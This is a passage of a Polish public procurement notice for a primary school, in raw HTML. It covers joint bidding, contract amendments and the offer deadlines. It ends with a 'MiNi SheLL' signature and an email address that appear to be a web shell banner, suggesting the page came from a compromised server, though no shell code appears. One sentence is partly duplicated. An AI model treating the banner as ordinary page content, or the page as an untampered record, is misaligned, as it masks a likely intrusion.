w imieniu tej spółki wynika z<br/>dołączonej do oferty umowy spółki bądź uchwały.2. Wykonawcy tworzący jeden podmiot<br/>przedłożą wraz z ofertą stosowne pełnomocnictwo.3. Pełnomocnictwo sporządza się w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym.4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie (przez każdego z Wykonawców lub pełnomocnika).5. W<br/>przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym<br/>mowa w art. 125 ust. 1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenie to potwierdza brak podstaw wykluczenia w zakresie, w którym każdy z<br/>Wykonawców wykazuje brak podstaw wykluczenia. 6. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania, składa każdy z Wykonawców<br/>wspólnie ubiegający się o zamówienie publiczne.7. Wszelka korespondencja prowadzona<br/>będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców składających<br/>wspólną ofertę 8. W przypadku, gdy oferta Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia zostanie wybrana, Zamawiający może zażądać przed zawarciem umowy w sprawie<br/>zamówienia publicznego umowy regulującej współpracę tych Wykonawców.zamówienia<br/>zostanie wybrana, Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 454-455 pzp. oraz wskazanym poniżej:<br/>1. Zamawiający między innymi przewiduje następujące możliwości dokonania zmian<br/>postanowień zawartej umowy:<br/>a) zmiana terminu realizacji umowy, określonego w par 2 ust. 3 w przypadku zaistnienia<br/>działania siły wyższej lub okoliczności, których nie można było przewidzieć ani im zapobiec,<br/>b) zmiana pozycji asortymentowej, gdy nastąpi wycofanie danego asortymentu z produkcji przez<br/>producenta i stanie się niedostępny na rynku – Wykonawca w tej sytuacji zobowiązany jest do<br/>zaoferowania dostępnego na rynku asortymentu, spełniającego co najmniej parametry<br/>techniczne określone w załączniku nr 1 do umowy - zmiana nie może powodować zmiany<br/>wysokości ceny określonej w par. 5 ust. 1 umowy.<br/>2) Podstawą wprowadzenia zmian postanowień umowy jest pisemny wniosek strony umowy lub<br/>projekt aneksu wraz z uzasadnieniem. Wniosek lub uzasadnienie do aneksu musi zawierać w<br/>szczególności:<br/>a) opis wnioskowanej zmiany,<br/>b) cel zmiany wraz z uzasadnieniem,<br/>c) wskazanie konkretnych zapisów umowy lub ustawy Pzp. pozwalających na wprowadzenie<br/>zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-19 08:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć za pośrednictwem Formularza do złożenia/zmiany/ wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu https://miniportal.uzp.gov.pl/, jako odbiorcę wskazując SZKOŁA PODSTAWOWA NR 1</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-19 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-18</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com